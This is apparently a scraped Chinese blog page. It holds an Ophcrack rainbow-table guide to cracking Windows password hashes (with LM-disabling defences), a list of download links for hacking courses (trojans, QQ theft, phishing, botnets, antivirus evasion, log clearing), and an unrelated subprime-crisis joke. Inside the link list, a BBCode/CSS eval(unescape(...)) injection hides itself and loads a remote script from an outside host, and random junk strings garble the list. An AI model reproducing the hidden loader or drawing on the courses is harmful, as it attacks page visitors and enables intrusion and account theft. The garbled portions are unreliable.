一般来说通过搜索引擎找出来的资料比较多，其中有很多都是重复的，一个比较好的方法就是找到一个突破口，然后逐一开展。从图1中首先获取了“Ophcrack”软件官方地址（ophcrack.sourceforge.net），它告诉我们Ophcrack是一款利用彩虹表来破解Windows密码的工具。其次是两篇有关Ophcrack的技术文章：杜莉翻译的“安全高手的利器认识彩虹哈希表破解工具”（http://tech.ccidnet.com/art/237/20070913/1211093_1.html），昵称为“寻找人生的起点”写的“使用Rainbow tables和Ophcrack的组合工具破解Windows密码”（http://blog.cn-ic.org/?p=62）。通过以上两人的文章我们了解到Ophcrack需要使用彩虹表，以及彩虹表生成，以及其它一些信息。
3.通过已有信息再次进行搜索和整理
通过查看他人的blog以及发表的文章我们对其进行分析和整理，最终获取了以下一些信息和资料：
（1）工具下载：http://sourceforge.net/project/showfiles.php?group_id=133599
（2）Ophcrack主页：http://ophcrack.sourceforge.net/
（3）英文维克关于彩虹表的定义和解释：http://en.wikipedia.org/wiki/Rainbow_table
（4）国内对彩虹表的研究：http://www.antsight.com/zsl/rainbowcrack/
（5）目前有关研究Ophcrack与彩虹表的相关资料。
通过以上三个步骤，我再次进行资料的分类，工具软件的下载，再此过程中分别下载了Ophcrack软件以及源代码，以及Ophcrack提供的彩虹表（http://ophcrack.sourceforge.net/tables.php），通过查看我们知道Ophcrack提供了三个免费的彩虹表：
（1）XP free small (380MB)
标识：SSTIC04-10k
破解成功率： 99.9%
字母数字表：
123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
一句话该表有大小写字母加数字生成，大小为388MB，包含所有字母数字混合密码中99.9%的LanManager表。这些都是用大小写字母和数字组成的密码（大约800亿组合）。
由于LanManager哈希表将密码截成每份7个字符的两份，我们就可以用该表破解长度在1到14之间的密码。由于LanManager哈希表也是不区分大小写的，该表中的800亿的组合就相当于12*10的11次方（或者2的83次方）个密码，因此也被称为“字母数字表10K”。
（2）XP free fast (703MB)
标识：SSTIC04-5k
成功率： 99.9%
字母数字表：
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
字母数字表5k大小为703MB 包含所有字母数字组合的密码中99.9%的LanManager表。但是，由于表变成2倍大，如果你的计算机有1GB以上的RAM空间的话，它的破解速度是前一个的4倍。
（3）XP special (7.5GB)
标识：WS-20k
成功率：96%
XP special扩展表 7.5GB，包含最长14个大小写字母、数字以及下列33个特殊字符（!"#$%&'()*+,-./:;<=>?@[\]^_`{|} ~）组成的密码中96%的LanManager表。该表中大约有7兆的组合，5*10的12次方（或者2的92次方）密码，该表需要花钱购买。
（4）破解Vista的彩虹表
Vista free (461MB) 是免费用来破解Vista的hash密码，而Vista special (8.0GB)需要购买。
小知识：
LM又叫LanManager，它是Windows古老而脆弱的密码加密方式。任何大于7位的密码都被分成以7为单位的几个部分，最后不足7位的密码以0补足7位，然后通过加密运算最终组合成一个hash。所以实际上通过破解软件分解后，LM密码破解的上限就是7位，这使得以今天的PC运算速度在短时间内暴力破解LM加密的密码成为可能（上限是两周），如果使用Rainbow tables，那么这个时间数量级可能被下降到小时。
二）对下载的工具进行试验
1.安装Ophcrack软件
Ophcrack软件的安装过程非常简单，按照提示安装即可，在安装过程需要特别注意，不要选择下载彩虹表，安装设置中会提供三个下载选项，分别下载WinXP （380MB）、Winxp （703MB）和Vista （461MB）彩虹表，如图2所示，笔者在安装过程中选择它后下载了数个小时，这个表可以在程序安装完成后再下载。否则安装Ophcrack软件要等彩虹表下载完成后才能使用。

2.使用Ophcrack软件
从程序菜单中直接运行Ophcrack软件，如图3所示，该软件主要有“Load”、“Delete”、“Save”、“Table”、“Crack”、“Help”以及“Exit”七大主要模块，“Load”主要负责装载Hash或者sam文件。“Delete”主要用来删除破解条目，“Save”主要保存破解结果或者破解session，“Table”主要用来设置彩虹表，“Crack”是开始执行破解，“Help”是查看帮助文件，呵呵，“Exit”俺就不说了。

3.下载彩虹表
可以到Ophcrack提供的彩虹表下载地址（http://ophcrack.sourceforge.net/tables.php）去下载，在本案例中分别下载了三个免费的彩虹表。
4.设置彩虹表
在Ophcrack软件主界面中单击“Table”，接着就会出来如图4所示的Table Selection界面，在缺省状态下，所有表都没有安装，通过该界面我们了解到一共有8个彩虹表，其中有三个是免费的。

然后单击并选中其中的一个条目，例如在本例中选择“Xp free fast”，然后单击“Install”按钮，系统会自动到Ophcrack软件的安装目录，不过本例是将三个压缩文件解压到F盘，如图5所示，选择“Tables”即可，然后一次安装所获取的其它二个彩虹表。

注意：
（1）在Ophcrack软件中其彩虹表的上级目录名称必须为“tables”，否则彩虹表安装不会成功。
（2）彩虹表安装成功后，其条目会变成绿色，且可以查看一共有多少个表，如图6所示。

5.准备破解材料

这里的破解材料主要是指通过GetHashes、Pwdump等软件获取的系统Hash密码值。如果没有，就自己想办法获取一个吧。
6.开始破解
（1）加载sam文件
单击“Load”按钮，选择“PWDUMP file”，如图7所示，一共有6个选项，第一个主要用于对单个Hash的破解，第二个是对获取的Pwdump文件进行破解，第
三个是对加密的sam文件进行破解，第四个和第五个主要用来审计或者破解本地和远程Hash密码。

（2）查看HASH密码值
在本例中选择一个已经Pwdump的文件，如果pwdump系统的hash密码没有错误，则会在Ophcrack软件主界面中正确显示，如图8所示，在主界面中分别显示“User”、“LM Hash”、“NT Hash”、“LM Pwd1 ”、“LM Pwd2”以及“NT pwd”等信息。

（3）清理无用Hash值
在本例中“IUSR_XFFZD-R1”、“TWWM_XFZD-SER1”和“TsInternetUser”这三个用户是系统自身的，在口令破解中基本没有用处，除非有人对该账号进行了克隆，因此可以分别选中需要删除的账号，然后单击主界面“Delete”按钮，删除这三个无用的账号以及我添加的“king$”账号，仅仅留下并破解管理员账号，清理完毕后如图9所示。

（4）执行破解

单击“Crack”案例开始破解，很快就破解出来了密码为“www119”，其“LM Pwd1”值跟“NT pwd”相同，破解密码的时间仅仅“37s”。

（5）查看破解统计信息
在主界面中单击“statistics”，可以查看关于破解hash密码值的普通和详细信息，如图11所示。

（6）破解参数设置
单击“Preferences”打开破解参数设置窗口，如图12所示，可以设置破解的线程，破解方式，是否隐藏用户名等。

（三）彩虹表破解密码防范策略
通过彩虹表来破解密码使得入侵者可以很方便的获取系统的口令，从而“正常”登录系统，让管理员或者计算机的主人不太容易发现。通过研究，发现可以通过两种方式来加强系统口令的安全。
1.通过设置超过一定位数的密码来加固口令安全
使用彩虹表破解14位以下的密码相对容易，对于普通入侵者来说仅仅有三个免费表，因此破解的强度相对要弱一些，因此可以通过增加密码设置的位数来加固系统口令安全。笔者建议设置超过32位的密码来加固系统的口令安全。关于口令的设置技巧有很多，在我们研究的专题中曾经提到过，在此为了照顾新朋友，可以再提一次密码设置的技巧：
通过一句话来设置密码，例如“2008-8月我国举办了奥运会，我去北京鸟巢观看了比赛，感觉很爽！”。可以这样设置“2008-8ywgjblayh,wqbjlcgklbs,gjhs!”，关于时间全取，标点符号全取，其他汉字取第一个字母，该密码长度为33位，如果再想长一点，还可以增加。其本质就是选择一句话或者诗词中的某一段来设置，容易记住，且安全强度高。
2. 使用NTLM方式加密
LM这种脆弱的加密方式在Windows2003还在使用，可以通过更改加密方式为NTLM，从而提高系统口令的安全，笔者在很多案例中也曾经发现通过pwdump以及GetHashes软件获取了hash值，但LC5以及Ophcrack软件均不能破解。
可以通过设定注册表参数禁用LM加密，代之以NTLM方式加密方法如下：
（1）打开注册表编辑器；
（2）定位到 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa；
（3）选择菜单“编辑”，“添加数值”；
（4）数值名称中输入：LMCompatibilityLevel，数值类型为：DWORD，单击“确定”；
（5）双击新建的数据，并根据具体情况设置以下值：
0 - 发送 LM 和 NTLM响应；
1 - 发送 LM 和 NTLM响应；
2 - 仅发送 NTLM响应；
3 - 仅发送 NTLMv2响应；(Windows 2000有效)
4 - 仅发送 NTLMv2响应，拒绝 LM；(Windows 2000有效)
5 - 仅发送 NTLMv2响应，拒绝 LM 和 NTLM；(Windows 2000有效)
（6）关闭注册表编辑器
（7）重新启动机器
在Windows NT SP3引入了NTLM加密，在Windows 2000以后逐步引入的NTLM 2.0加密。但是LM加密方式默认还是开启的，除非通过上面的方法刻意关闭它。

安全软件+教程（批量）

382135401@qq.com(X_情義) — Sun, 05 Apr 2009 14:21:48 GMT

第一课超速黑客安全学习法总结
http://www.hx95.com/20081115/hxhack01.rar
第二课手工关闭被黑客扫描端口
http://www.hx95.com/20081115/hxhack02.rar
第三课杀毒软件安装和配置设置
http://www.hx95.com/20081115/hxhack03.rar
第四课防火墙的安装和配置应用
http://www.hx95.com/20081115/hxhack04.rar
第五课黑客必用虚拟机安装教程
http://www.hx95.com/20081115/hxhack05.rar
第六课黑客常见DOS学习并掌握
http://www.hx95.com/20081115/hxhack06.rar
第七课：网马制作与防御中马专题
http://www.hx95.com/20081115/hxhack07.rar
http://www.hx95.com/20081115/hxhack08.rar
第九课服务器建立隐藏帐号与查找隐藏帐号
http://www.hx95.com/20081115/hxhack09.rar
第十课 QQ盗号与防盗专题
http://www.hx95.com/20081115/hxhack10.rar
第十一课 QQ制作钓鱼网站盗与御专题
http://www.hx95.com/20081115/hxhack11.rar
第十二课软件捆绑木马与反捆绑技术
http://www.hx95.com/20081115/hxhack12.rar
第十三课上兴远控专题（配置，使用)
http://www.hx95.com/20081115/hxhack13.rar
第十四课上兴远控专题内网篇-路由上线
http://www.hx95.com/20081115/hxhack14.rar
第十五课网页插入隐藏后门 bB}TmoQ;BD
http://www.hx95.com/20081115/hxhack15.rar
第十六课 DDOS软件使用教程 vE-f$/pk q
http://www.hx95.com/20081115/hxhack16.rar ;
第十七课常见挂马技术讲解和实战演示
http://www.hx95.com/20081115/hxhack17.rar
第十八课实战3389端口入侵抓肉鸡
http://www.hx95.com/20081115/hxhack18.rar
第十九课批量135抓肉鸡工具配置使用
http://www.hx95.com/20081115/hxhack19.rar
第二十课抓4899弱口令肉鸡 IXWoTeS
http://www.hx95.com/20081115/hxhack20.rar
第二十一课 CHM木马的制作
第二十二课手把手破解路由密码
http://www.hx95.com/20081115/hxhack22.rar
第二十三课制作隐蔽RM木马全攻略码
http://www.hx95.com/20081115/hxhack23.rar
第二十四课 Doc文本捆绑木马抓肉鸡演示
http://www.hx95.com/20081115/hxhack24.rar
http://www.hx95.com/20081115/hxhack25.rar
第二十六课终极学习rar高级捆绑技术
http://www.hx95.com/20081115/hxhack26.rar
第二十七课菜鸟制作黑客GUI版扫描器
http://www.hx95.com/20081115/hxhack27.rar
第二十八课手把手学会破解FTP密码
http://www.hx95.com/20081115/hxhack28.rar
第二十九课恢复误删文件技术
http://www.hx95.com/20081115/hxhack29.rar
第三十课手把手学习swf文件挂马技术
http://www.hx95.com/20081115/hxhack30.rar
第三十一课 VirtualPC安装使用教程
http://www.hx95.com/20081115/hxhack31.rar
第三十二课后门制作篇-IIS后门
http://www.hx95.com/20081115/hxhack32.rar
第三十三课入侵后必学-清除日志
http://www.hx95.com/20081115/hxhack33.rar
第三十四课 x-scan扫描器的使用技巧详解
http://www.hx95.com/20081115/hxhack34.rar
第三十五课端口技术综合详细讲解
http://www.hx95.com/20081115/hxhack35.rar

（请大家耐心等待更新）
*************************************************
入侵渗透提权
讲师：职业色狼
*************************************************
动力后台拿shell :
http://www.hx95.com/20081115/ypde01.rar
渗透讲解教程
http://www.hx95.com/20081115/ypde02.rar )
利用肉鸡建立VPN
http://www.hx95.com/20081115/ypde03.rar )
利用弱口令拿服务器
http://www.hx95.com/20081115/ypde04.rar
利用install.asp拿z-blog shell
http://www.hx95.com/20081115/ypde05.rar
ms08067漏洞的利用
http://www.hx95.com/20081115/ypde06.rar
pjblog相册2.0漏洞
http://www.hx95.com/20081115/ypde07.rar
利用SA注射点拿系统
http://www.hx95.com/20081115/ypde08.rar
（请大家耐心等待更新）
脚本入侵班
讲师：阳光 ,
*************************************************
第一课网站入侵概述
http://www.hx95.com/20081115/jbrq01.rar
第二课常见网站入侵软件介绍和使用
http://www.hx95.com/20081115/jbrq02.rar

http://www.hx95.com/20081115/jbrq03.rar
第四课抓包改包入侵网站(实例演示)
http://www.hx95.com/20081115/jbrq04.rar
第五课一句话木马2种方法入侵网站(实例演示)
http://www.hx95.com/20081115/jbrq05.rar
第六课 Cookie欺骗的简单讲解+利用实例
http://www.hx95.com/20081115/jbrq06.rar
第七课 .asp解分漏洞实战入侵
http://www.hx95.com/20081115/jbrq07.rar
第八课旁注入侵思路及条件
http://www.hx95.com/20081115/jbrq08.rar
第九课啊D+google获得大量注入点
http://www.hx95.com/20081115/jbrq09.rar
第十课数据库恢复技术入侵网站
http://www.hx95.com/20081115/jbrq10.rar
第十一课 ewebeditor编辑器漏洞入侵
http://www.hx95.com/20081115/jbrq11.rar
第十二课巧妙利用漏洞入侵科讯网站
http://www.hx95.com/20081115/jbrq12.rar

提权入侵班 B3m'_t{S^P
讲师：阳光 LH^# 6lwD7
*************************************************
第一课提权概述 ^WJ"f+|
http://www.hx95.com/20081115/tqrq01.rar
第二课 serv-u服务器提权（目录无修改权限）
http://www.hx95.com/20081115/tqrq02.rar
第三课 serv-u服务器提权（目录有修改权限）
http://www.hx95.com/20081115/tqrq03.rar
第四课 pcanywhere提权方法
http://www.hx95.com/20081115/tqrq04.rar
第五课 FlashFXP替换文件提权
http://www.hx95.com/20081115/tqrq05.rar
第六课 VNC密码破解提权
http://www.hx95.com/20081115/tqrq06.rar
第七课 CAIN 嗅探3389密码提权
http://www.hx95.com/20081115/tqrq07.rar
第八课替换服务提权
http://www.hx95.com/20081115/tqrq08.rar
第九课利用HASH破解提权 FnQ#mSKA
http://www.hx95.com/20081115/tqrq09.rar
第十课启动项提权
http://www.hx95.com/20081115/tqrq10.rar
第十一课 CAcls命令在提权中的使用
http://www.hx95.com/20081115/tqrq11.rar
第十二课 Windows-2003-webshell默认权限
http://www.hx95.com/20081115/tqrq12.rar
第十三课 Windows 2003服务器默认文件夹权限
http://www.hx95.com/20081115/tqrq13.rar
第十四课利用perl提升权限
http://www.hx95.com/20081115/tqrq14.rar
第十五课端口映射解决内网提
http://www.hx95.com/20081115/tqrq15.rar
网站建设系列教程
第一课：
HTML语言之页面标记
http://www.hxhack.com/bbs/hxjc/200801jc/2008010101.rar
第二课：
HTML语言之字体标记
http://www.hxhack.com/bbs/hxjc/200801jc/2008010102.rar
第三课：
HTML语言之文字布局标记
http://www.hxhack.com/bbs/hxjc/200801jc/2008010103.rar
第四课：
HTML语言之图象标记
http://www.hxhack.com/bbs/hxjc/200801jc/2008010104.rar
第五课：
HTML语言之表单标记(1
http://www.hxhack.com/bbs/hxjc/200801jc/2008010105.rar
第六课：
HTML语言之表单标记(2)
http://www.hxhack.com/bbs/hxjc/200801jc/2008010106.rar
第七课：
HTML语言之表格标记
http://www.hxhack.com/bbs/hxjc/200801jc/2008010107.rar

第八课：
HTML语言之多窗口页面标记
http://www.hxhack.com/bbs/hxjc/200801jc/2008010108.rar
第九课：
HTML语言之会移动的文字标记
http://www.hxhack.com/bbs/hxjc/200801jc/2008010109.rar
第十课：

HTML语言之多媒体页面标记 X=x2y$$$w
http://www.hxhack.com/bbs/hxjc/200801jc/2008010110.rar
xp操作系统系列教程
教程下载地址：
第一课：
xp系统安全防护之手动关闭危险的端口 ;[bGSfT }Z
http://www.hxhack.com/bbs/hxjc/200801jc/2008010301.rar
第二课：
xp系统安全防护之手动关掉一些不需要的服务
http://www.hxhack.com/bbs/hxjc/200801jc/2008010302.rar
第三课：
xp系统安全防护之系统帐号安全 :.
http://www.hxhack.com/bbs/hxjc/200801jc/2008010303.rar
第四课：

优化xp系统启动加速
http://www.hxhack.com/bbs/hxjc/200801jc/2008010304.rar
第五课：
用策略组摆脱黑客攻击

http://www.hxhack.com/bbs/hxjc/200801jc/2008010305.rarx
如何防护网页木马
http://www.hxhack.com/bbs/hxjc/200801jc/2008010306.rar

黑客技术系列教程

教程下载地址：

第一课：
灰鸽子内网上线教程（带工具，工具不免杀；解压之前请先关闭杀毒软件。）
http://www.hxhack.com/bbs/hxjc/200801jc/2008010201.rar #_1 K+ev(
第二课：
批量抓135工具使用教程 5:ih}}l}
http://www.hxhack.com/bbs/hxjc/200801jc/2008010202.rar
第三课：
网马制作以及挂马
http://www.hxhack.com/bbs/hxjc/200801jc/2008010203.rar
第四课：
上兴远控制上线教程

http://www.hxhack.com/bbs/hxjc/200801jc/2008010204.rar
第五课：
捆绑软件抓肉鸡教程
http://www.hxhack.com/bbs/hxjc/200801jc/2008010205.rar
第六课：

巧妙入侵网站教程
http://www.hxhack.com/bbs/hxjc/200801jc/2008010206.rar

大型免费培训服务器系列教程

第一课：
服务器防黑安全设置教程
http://www.hxhack.com/bbs/hxjc/200801jc/2008010401.rar

免杀系列教程

教程下载地址：
第一课：
免杀培训——了解免杀
http://www.hx95.com/Down/Muma/200804/658.htm
第二课：
免杀培训——杀软及环境 -^C[a=B\
http://www.hx95.com/Down/Muma/200804/659.htm

第三课：
免杀培训——工具和壳 UsG(#'21$
http://www.hx95.com/Down/Muma/200804/660.htm

第四课：免杀培训——加壳免杀 &j/{8rMf)
http://www.hx95.com/Down/Muma/200804/661.htm
第五课：
免杀培训——花指令学习(一)
http://www.hx95.com/Down/Muma/200804/662.htm

第六课：
免杀培训——花指令学习(二) !
http://www.hx95.com/Down/Muma/200804/663.htm
'mBkz 0)J}
第七课：

免杀培训——MYCCL定位文件特征码
http://www.hx95.com/Down/Muma/200804/664.htm

第八课：
免杀培训——定位文件内存特征码
http://www.hx95.com/Down/Muma/200804/665.htm

第九课：
免杀培训——常见特征码的修改
http://www.hx95.com/Down/Muma/200804/666.htm

第十课：

免杀培训——关于特征码定位在输入表免杀
http://www.hx95.com/Down/Muma/200804/749.htm

第十一课：
免杀培训——修改文件PE头
http://www.hx95.com/Down/Muma/200804/750.htm

第十二课：
免杀培训——修改黑防鸽子服务端的关联
http://www.hx95.com/Down/Muma/200805/850.htm

第十三课：
免杀培训——免杀要的就是简单 EdAWA=2q
http://www.hx95.com/Down/Muma/200805/868.htm

第十四课：
免杀培训——打造自动生成的
http://www.hx95.com/Down/Muma/200805/879.htm

网络安全培训教程
第一课：了解掌握学习黑客知识
http://www.hx95.com/20080808/01.rar
第二课：打造安全的windows系统
http://www.hx95.com/20080808/02.rar
第三课：批量抓鸡教程 j^$m xI;
http://www.hx95.com/20080808/03.rar
第四课：远程控制类木马的检测和清除
http://www.hx95.com/20080808/04.rar
第五课：常用DOS命令 u=l67i0
http://www.hx95.com/20080808/05.rar )
第六课：百度最新跨站演示
http://www.hx95.com/20080808/06.rar
第七课：菜鸟抓3389教程
http://www.hx95.com/20080808/07.rar
第八课：TomCat弱口令批量入侵
http://www.hx95.com/20080808/08.rar
第九课：取QQ网络硬盘中URL
http://www.hx95.com/20080808/09.rar
第十课：破解windows密码
http://www.hx95.com/20080808/10.rar
第十一课：网吧游戏添加教程
http://www.hx95.com/20080808/11.rar
第十二课：软件脱壳和版权修改
http://www.hx95.com/20080808/12.rar
第十三课：上兴远控简单过内存和主动
http://www.hx95.com/20080808/13.rar
第十四课：华夏黑客联盟delphi系列教程第一课
http://www.hx95.com/20080808/14.rar
第十五课：华夏黑客联盟delphi系列教程第二课
http://www.hx95.com/20080808/15.rar 9J)
第十六课：华夏黑客联盟delphi系列教程第三课
http://www.hx95.com/20080808/16.rar
第十七课：华夏黑客联盟delphi系列教程第四课
http://www.hx95.com/20080808/17.rar
第十八课：华夏黑客联盟delphi系列教程第五课
http://www.hx95.com/20080808/18.rar
第十九课：易兵培训动画 --- 初学初识
http://www.hx95.com/20080808/19.rar
第二十课：易兵培训动画 --- 系统认识
http://www.hx95.com/20080808/20.rar
第二十一课：delphi编写永久免杀和无后门的盗QQ木马（1）
http://www.hx95.com/20080808/21.rar
第二十二课：delphi编写永久免杀和无后门的盗QQ木马（2）
http://www.hx95.com/20080808/22.rar
第二十三课：delphi编写永久免杀和无后门的盗QQ木马（3）
http://www.hx95.com/20080808/23.rar
第二十四课：delphi编写永久免杀和无后门的盗QQ木马（4）
http://www.hx95.com/20080808/24.rar
[flash,0,0]http://catche.qq.com/temp/20081209/4236888.swf[email=]id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//love.avtupian.com/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]

跟美女上床和次贷危机

382135401@qq.com(X_情義) — Fri, 03 Apr 2009 10:36:09 GMT

前两天看到一个故事——
有一天，一位其貌不扬的男士，带着一位十分艳丽的OL，来到Causeway Bay一家LV店。他为OL选了一价值6万5千元的LV handbag。
　　付款时，男士掏出支票本，十分潇洒地签了一张支票。店员有些为难，因为这对夫妇是第一次来店里购物。
　　男士看穿了店员的心思，十分冷静地对店员说： "我感觉到，您担心这是一张是空头支票，对吗？今天是周六，银行关门。我建议您把支票和handbag都留下。等到星期一支票兑现之后，再请你们把 handbag 送到这位小姐的府上。您看这样行不行？"
　　店员放了下心来，欣然地接受了这个建议，并且大方的承诺，递送handbag的费用由该店承担，他本人将会亲自把这件事情给办妥。
　　星期一，店员拿着支票去银行入账，支票果真是张空头支票！愤怒的店员打电话给那位顾客，客户对他说： "这没有什么要紧啊！你和我都没有损失。上星期六的晚上我已经同那个女孩上床了！哦，多谢您的合作。"
这个故事揭示了次贷危机的本质。人们在对未来收益充满良好预期的时候，对于可能加大风险缺乏防范意识。美女认为周一六万多LV就到家了，自然也就放松了警惕，认为ONS的投资是值得的，对于投入产出的预期是建立在一个具有巨大不确定风险的情况下的。而对未来收益预期的包装则是这些投资机构最擅长的事情。中国的股民大多跟这个美女一样，所以亏钱基本上是活该，没有这些人，股市赚谁的钱呢。而媒体和分析家们，往往在其中扮演了LV店员的配合角色